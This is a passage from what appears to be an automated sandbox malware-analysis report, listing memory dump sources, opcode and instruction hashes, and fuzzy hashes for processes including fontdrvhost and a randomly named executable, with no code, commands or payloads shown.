                                                                                            • Instruction Fuzzy Hash: 3641D674A1891D8FDB98EF68C895BECB7F1FB58305F5480A9904EE3691CE74A8918B40
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002F.00000002.1870101240.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_47_2_7ffb4b290000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: bcb022a2cececc8c2eee81daff7876487d99c1f5d7e04d077b1434f4363902f9
                                                                                            • Instruction ID: f252e8983d6964747f33860c4f67401cf51fc005357b155477667c97e771c557
                                                                                            • Opcode Fuzzy Hash: bcb022a2cececc8c2eee81daff7876487d99c1f5d7e04d077b1434f4363902f9
                                                                                            • Instruction Fuzzy Hash: F631A971A1891D8FDF94EF68C855AEEBBB2FB98305F10412AD50DE7295CB349845CB80
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002F.00000002.1870101240.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_47_2_7ffb4b290000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: dc1de51fbb7697dcacc842ea9f233ba6d52f299a17354e25dcbde419ad86eabe
                                                                                            • Instruction ID: 8391eabe7e1b5eb8aa6860a11caac4060ed2d90cce9b74a731abd658fa92ebea
                                                                                            • Opcode Fuzzy Hash: dc1de51fbb7697dcacc842ea9f233ba6d52f299a17354e25dcbde419ad86eabe
                                                                                            • Instruction Fuzzy Hash: B6416BB0D096598FEB56EFB8C8556EDBBB1FF45301F4041BAD04DD72A2CA399881CB00
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002F.00000002.1870101240.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_47_2_7ffb4b290000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: bedf9b70464897549315fff3fc3ab4df1b880bf1624e41d1a5098c857e738583
                                                                                            • Instruction ID: da929fa90c19dc9e7c7023901d8032415f43edbc53878961912afa68b770405c
                                                                                            • Opcode Fuzzy Hash: bedf9b70464897549315fff3fc3ab4df1b880bf1624e41d1a5098c857e738583
                                                                                            • Instruction Fuzzy Hash: CD3115A192DACA8FE761EF3CC8241E97FB0FF66214F4541BAE88C86197DA245845C391
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002F.00000002.1870101240.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_47_2_7ffb4b290000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9a34d68de1ebc78f4093c22c3b1e91f63bea0b951d72d4f960086a821584390a
                                                                                            • Instruction ID: 832eafc69c628ad4b489e99d5a3c43ca95cc132bc57e04114237bcc059d06b86
                                                                                            • Opcode Fuzzy Hash: 9a34d68de1ebc78f4093c22c3b1e91f63bea0b951d72d4f960086a821584390a
                                                                                            • Instruction Fuzzy Hash: C3215C71A08A5D9FDF81EF68D855AEDBBF1FF59311F00416AE40CE72A1CA2498518790
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002F.00000002.1870101240.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_47_2_7ffb4b290000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7848ea661771ea52e515bfb9509077c0baff1405c83130e15d5ad8556c1da141
                                                                                            • Instruction ID: 97ad693fea0aa82162d24f5769ebb80399cde5b4426a283f2cc793c9f80948dd
                                                                                            • Opcode Fuzzy Hash: 7848ea661771ea52e515bfb9509077c0baff1405c83130e15d5ad8556c1da141
                                                                                            • Instruction Fuzzy Hash: 35312B70E1961E8BE7A9EE24C5593B9B6B1EF54300F1045B9D95ED32A2CE38A981CB40
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002F.00000002.1870101240.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_47_2_7ffb4b290000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: db460cfbef28f519c99f2eeaec63ceb810f6bcb6ea523e390a65a4fa7e4befa4
                                                                                            • Instruction ID: f8ccc4b508fd9feb30b01204b3d99c2d410e9253d2c130c005ad3a5edc57d85b
                                                                                            • Opcode Fuzzy Hash: db460cfbef28f519c99f2eeaec63ceb810f6bcb6ea523e390a65a4fa7e4befa4
                                                                                            • Instruction Fuzzy Hash: 86218EB1E0D60E8AE768FF74C5456BA7BB1FF84310F1040B9D61E932E2DE38A941CA40
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002F.00000002.1870101240.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_47_2_7ffb4b290000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ed0b046b4deaee06f0fac2b0bf564a56ceecaf6a7c0128ad75bbbdd7f66ca1c4
                                                                                            • Instruction ID: d36a10a55e00c8aa431aeff8533cbce924c646ce5e6e7fb44230eddff9c1a7cc
                                                                                            • Opcode Fuzzy Hash: ed0b046b4deaee06f0fac2b0bf564a56ceecaf6a7c0128ad75bbbdd7f66ca1c4
                                                                                            • Instruction Fuzzy Hash: E0219F74A1891D9FDF84EF98D495EEEBBB1FF68301F10416AE50AE3255CA34E8418B90
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002F.00000002.1870101240.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_47_2_7ffb4b290000_fontdrvhost.jbxd
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 0O3K$@O3K$PO3K$`O3K$pP3K
                                                                                            • API String ID: 0-2982639361
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000030.00000002.1886149286.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_48_2_7ffb4b2a0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: "$H$[$[$\$]$]$u${${$}$}
                                                                                            • API String ID: 0-2063274034
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID: 0-3916222277
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: H#4K
                                                                                            • API String ID: 0-533413016
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000030.00000002.1886149286.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_48_2_7ffb4b2a0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 3909a3543a950743c9163f39cf85f73cab1e1c8737348df9a78d7e2e8e3c47f3
                                                                                            • Instruction ID: 8327aa3ef3815d8d16a4cf6044ea7a0996eedeff810453dc8955b1666e1a008c
                                                                                            • Opcode Fuzzy Hash: 3909a3543a950743c9163f39cf85f73cab1e1c8737348df9a78d7e2e8e3c47f3
                                                                                            • Instruction Fuzzy Hash: A571E8B0D0992D8FDBA5EF58C894BE9B7F1FB58301F5001AAD40DE3251CB35AA85CB40
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000030.00000002.1886149286.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_48_2_7ffb4b2a0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 06f876c1d73305083ee7376fda85349a5066ada9d3e9df7ba01cd15684bc94ff
                                                                                            • Instruction ID: dcc610253df267311462ccdb90ac95cee43a090673de601fffb3c1237544beb9
                                                                                            • Opcode Fuzzy Hash: 06f876c1d73305083ee7376fda85349a5066ada9d3e9df7ba01cd15684bc94ff
                                                                                            • Instruction Fuzzy Hash: 9E619FB190C6598FDB96FF68C5557A8BFB1FF59300F4081BAC10993292CB386945CB40
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000030.00000002.1886149286.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_48_2_7ffb4b2a0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: db9a14b21b29800e6b288361678a11974929eefd18d11efe50e5be8b57dce6d7
                                                                                            • Instruction ID: 5a02ecce8da156144effb4dde400a6772d785d77c3e6a8142e7518cb98eea6b1
                                                                                            • Opcode Fuzzy Hash: db9a14b21b29800e6b288361678a11974929eefd18d11efe50e5be8b57dce6d7
                                                                                            • Instruction Fuzzy Hash: 0751B3B0E18A1D8FDB94EFA8C855BADBBB1FF58701F10016AD40DE7691CA746881CB40
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000030.00000002.1886149286.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_48_2_7ffb4b2a0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 70dfb590b351ea82a6a1854daaa4f35f7cdcc9c63d037630c9aae6e5d2044ec7
                                                                                            • Instruction ID: c62cf88da4c323bbdf3cfe9a44ae960f6e4fe09460d94aceaa899c4c97f84aa0
                                                                                            • Opcode Fuzzy Hash: 70dfb590b351ea82a6a1854daaa4f35f7cdcc9c63d037630c9aae6e5d2044ec7
                                                                                            • Instruction Fuzzy Hash: 2251FBB0D18A5D8FDF94EFA8C9546EDBBB2FF58301F14412AD409E7295CB345845CB40
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000030.00000002.1886149286.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_48_2_7ffb4b2a0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ce5c5db8704b681990348c873efa0add577db3538b0f421db2adac293d6e1f8f
                                                                                            • Instruction ID: 0baeaffd7ebeb0338e4d8ed089e53daa5df75b7d607e8230b615eb2d77305014
                                                                                            • Opcode Fuzzy Hash: ce5c5db8704b681990348c873efa0add577db3538b0f421db2adac293d6e1f8f
                                                                                            • Instruction Fuzzy Hash: A5419AB0E1891D8FDB45EFA8D841AEEBBB1FF58300F1001BAE409E7295DA35A9018B51
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000030.00000002.1886149286.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_48_2_7ffb4b2a0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9b14705a7aa40ba788124fb8f8b74987c328b20bfc3eef2a340d9572ed72b488
                                                                                            • Instruction ID: 6a51c7ea6d9b6ff0e8c20c7aeb1a15149556073ec6561a3efc6dd57bad9b6c8b
                                                                                            • Opcode Fuzzy Hash: 9b14705a7aa40ba788124fb8f8b74987c328b20bfc3eef2a340d9572ed72b488
                                                                                            • Instruction Fuzzy Hash: 47516C7180D2898FDB56EF74C8A52FEBBB0EF1A300F0545BAD505E7192DB385A48CB51
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000030.00000002.1886149286.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_48_2_7ffb4b2a0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 1a0068f34a1b29fe6c307462f7c2077648164d9ea866e5ca78e5702e47224c1c
                                                                                            • Instruction ID: 27c975238e05f085f1ba108cd4e866741e1b1ed7b6767f5a54c56cda659ea4f7
                                                                                            • Opcode Fuzzy Hash: 1a0068f34a1b29fe6c307462f7c2077648164d9ea866e5ca78e5702e47224c1c
                                                                                            • Instruction Fuzzy Hash: BA4127B1C09A1D8FDB51EFB4D4486EEBBB1FF59300F50057AE409E3192DA78A945CB80
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000030.00000002.1886149286.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_48_2_7ffb4b2a0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 6733d296242cf56c1ee9ea70c5c52d2c4ff8980d09ab146ea6bc6d55efa482d5
                                                                                            • Instruction ID: 4c421fe0df8d6ea25e6bf716aec7ad76b5ec9c5437eb9d75024a5ac02cc54d90
                                                                                            • Opcode Fuzzy Hash: 6733d296242cf56c1ee9ea70c5c52d2c4ff8980d09ab146ea6bc6d55efa482d5
                                                                                            • Instruction Fuzzy Hash: 4441F974A1891D8FDFA8EF68D895BACB7F1FB58705F5480A9D04EE3251CE74AC818B40
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000030.00000002.1886149286.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_48_2_7ffb4b2a0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 969213f17d58af67b629abeeedb09acc8e76da1b4d14e635bcf618f74b2f2b41
                                                                                            • Instruction ID: a9cb4e365ad23b9831725f4aa03d4e575c30127b084bcf6bb78e917607037863
                                                                                            • Opcode Fuzzy Hash: 969213f17d58af67b629abeeedb09acc8e76da1b4d14e635bcf618f74b2f2b41
                                                                                            • Instruction Fuzzy Hash: 2631CB7091891D8FDF94EF68C955BEEBBB2FF98301F10452AD509E7295CB34A845CB80
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000030.00000002.1886149286.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_48_2_7ffb4b2a0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 09ac0ef622fc3b09fb3af6261a1c5ce9611f8f96ee1c79b79c17f1d185be774b
                                                                                            • Instruction ID: bf4d57c15ad9bfd7338a3a14e576408699e5bb640a16d4e680c46a2e364cca60
                                                                                            • Opcode Fuzzy Hash: 09ac0ef622fc3b09fb3af6261a1c5ce9611f8f96ee1c79b79c17f1d185be774b
                                                                                            • Instruction Fuzzy Hash: F6418DB0D096598FE745EFB4C8596EDBBB2FF49301F4041BAD009E76A2CB389881CB00
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000030.00000002.1886149286.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_48_2_7ffb4b2a0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 5557fda24b7cfd7583fc064605848f6e1e53d0d280439baad7b1135e9b7e1165
                                                                                            • Instruction ID: 64b743437e434a33b80ca43752265c6c14ffa402a485ecaa9fed4fa843a8152f
                                                                                            • Opcode Fuzzy Hash: 5557fda24b7cfd7583fc064605848f6e1e53d0d280439baad7b1135e9b7e1165
                                                                                            • Instruction Fuzzy Hash: 573129A182DACA4FE751FF3CC8242E97FA0FF5A314F4541BAE888875D3CA249845C381
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000030.00000002.1886149286.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_48_2_7ffb4b2a0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ab3c4043a5350e0636dc6479564d84f2b6ffb071bfbb2db9415e78b54138a123
                                                                                            • Instruction ID: 4a118f80d29acffadd2620a9fba48b8696279ebd510abe360731b6b5fe250a76
                                                                                            • Opcode Fuzzy Hash: ab3c4043a5350e0636dc6479564d84f2b6ffb071bfbb2db9415e78b54138a123
                                                                                            • Instruction Fuzzy Hash: 28217CB1908A5D8FDB81EF68D845AEDBFF1FF59311F00016AE408E72A2CA2498518790
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000030.00000002.1886149286.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_48_2_7ffb4b2a0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 6d1563f4e189de257449d5a91e86e835568cb1a58dd03760ffc05d03b16719d3
                                                                                            • Instruction ID: 432b2cf65856f07ee614a3a6a66f1d6796b3a3c403ab108cc8ef2047a92d172e
                                                                                            • Opcode Fuzzy Hash: 6d1563f4e189de257449d5a91e86e835568cb1a58dd03760ffc05d03b16719d3
                                                                                            • Instruction Fuzzy Hash: E3313C70D1961A8BE7A9EF34C5593B9B7A1EF58300F1045B9D95DE32E2CE38A981CB40
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000030.00000002.1886149286.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_48_2_7ffb4b2a0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 56248432fb69ac0a677232e4dae62dab6d2cca0cb5f92820c0fc40843c77e8a0
                                                                                            • Instruction ID: e5071992ebbd2b7bf7938c3c68a92fc153c802d39167efd51e264a03ea8cc777
                                                                                            • Opcode Fuzzy Hash: 56248432fb69ac0a677232e4dae62dab6d2cca0cb5f92820c0fc40843c77e8a0
                                                                                            • Instruction Fuzzy Hash: 112195B1D1D60A8BE768FF74C5456B9BBB1EF88310F104079D51D935E2DE38A941CB40
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000030.00000002.1886149286.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_48_2_7ffb4b2a0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 523eacced990334f353bbaf829b7e0b5ee1de86401848d54d1ef95ec8d53d481
                                                                                            • Instruction ID: a90961b2d0e2d26900273c7c05e8c916fe639d1a0274d860fb21a809bbc7d84f
                                                                                            • Opcode Fuzzy Hash: 523eacced990334f353bbaf829b7e0b5ee1de86401848d54d1ef95ec8d53d481
                                                                                            • Instruction Fuzzy Hash: 45219F74A1891D8FDF84EF98D495EEEBBB1FF6C301F10416AE50AE3255CA34E8418B90
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000030.00000002.1886149286.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_48_2_7ffb4b2a0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 6ef1a7b38da4eca1f9a4612c545b2a319db310a3dfadde5a8d8c3bf78c204537
                                                                                            • Instruction ID: 076480a7b0ea5822112c9a8fb66e2d8260d65a5178a86c537296de41b80a8a20
                                                                                            • Opcode Fuzzy Hash: 6ef1a7b38da4eca1f9a4612c545b2a319db310a3dfadde5a8d8c3bf78c204537
                                                                                            • Instruction Fuzzy Hash: 38214C7090E7498FE769EF68C8197B9BBB1EF49310F0401BAD509D32D2DE38A845CB51
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000030.00000002.1886149286.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_48_2_7ffb4b2a0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: fee431c335face6f7a6937469221c3395702ab4457be69afcd241e7c5da89ef0
                                                                                            • Instruction ID: 9e635a9282343df4108c5cc148ec0bc522cf127d5a1cd3b3710e20dd89dcefdb
                                                                                            • Opcode Fuzzy Hash: fee431c335face6f7a6937469221c3395702ab4457be69afcd241e7c5da89ef0
                                                                                            • Instruction Fuzzy Hash: 66117F7090D7894FE76AAF74C4157B97FB1AF46310F0440BAD449D71D3CD689845C751
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000030.00000002.1886149286.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_48_2_7ffb4b2a0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000032.00000002.1952694644.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_50_2_7ffb4b2b0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e2a0358b9d1c14f55514e000d3013733f2130df6e9e0cf98ca2dd91299d78a5d
                                                                                            • Instruction ID: e597adb5fe13f05407af503440cddbb0d90dc9771ae58c4d178e16d7bb838f33
                                                                                            • Opcode Fuzzy Hash: e2a0358b9d1c14f55514e000d3013733f2130df6e9e0cf98ca2dd91299d78a5d
                                                                                            • Instruction Fuzzy Hash: CA51C8B1D1995D8FDB99EF68C4A5BA8BBA1FF58301F5440BDD00EE7296CE346881CB01
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000032.00000002.1952694644.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_50_2_7ffb4b2b0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b503bb5e59e005645559700cbb9c9c8e465626a3472feeba4c1f917b1811b69a
                                                                                            • Instruction ID: 81589b286a9c824d62bdb4703fe75acd8e12f8cc5105a5f06436739f71bd37c2
                                                                                            • Opcode Fuzzy Hash: b503bb5e59e005645559700cbb9c9c8e465626a3472feeba4c1f917b1811b69a
                                                                                            • Instruction Fuzzy Hash: 6151A2B0D18A1D8FDB94EFA8C895BEDBBB1FF58301F10416AD509E7291DA746881CB41
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000032.00000002.1952694644.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_50_2_7ffb4b2b0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 0b420466c0fb1f5e44d8772a3bf6b6e0240b5a63360f43d93f18ea681114a1fe
                                                                                            • Instruction ID: 01c93d6138ccda6e0b8b8a84a06943ddc9c3c9b5fc61e68dec84bf7f5a42ab3f
                                                                                            • Opcode Fuzzy Hash: 0b420466c0fb1f5e44d8772a3bf6b6e0240b5a63360f43d93f18ea681114a1fe
                                                                                            • Instruction Fuzzy Hash: 3451C8B0D18A5D8FDF99EFA8C8546EEBBB2FF58301F14412AD509E7295CB349845CB40
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000032.00000002.1952694644.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_50_2_7ffb4b2b0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 89455aa2c5e2ce4c8134020821965538a286fa8a1cfe92323551f2f20f2f6f12
                                                                                            • Instruction ID: 7a33ef15036c4069730098a3b4d9a38acef3649adf6558c7e99303b005bc8e18
                                                                                            • Opcode Fuzzy Hash: 89455aa2c5e2ce4c8134020821965538a286fa8a1cfe92323551f2f20f2f6f12
                                                                                            • Instruction Fuzzy Hash: 91419CB1E1C91D8FDB45EFA8D841AEEBBF1FF58300F10017AE40AE7295DA34A9018B51
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000032.00000002.1952694644.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_50_2_7ffb4b2b0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 672dd549a0fb81458d60599cb4762c981f88911e9397b31c61c5b44a45cc4936
                                                                                            • Instruction ID: b34839d2d712622ff9dd2d61cb00b88c29aa3d9f9759a2ea8273f3694f3388d3
                                                                                            • Opcode Fuzzy Hash: 672dd549a0fb81458d60599cb4762c981f88911e9397b31c61c5b44a45cc4936
                                                                                            • Instruction Fuzzy Hash: 7C5189B1C0D68A8FDB56AF64C8542FEBFF0FF06300F0545AAD544E7192DA285A48CB51
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000032.00000002.1952694644.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
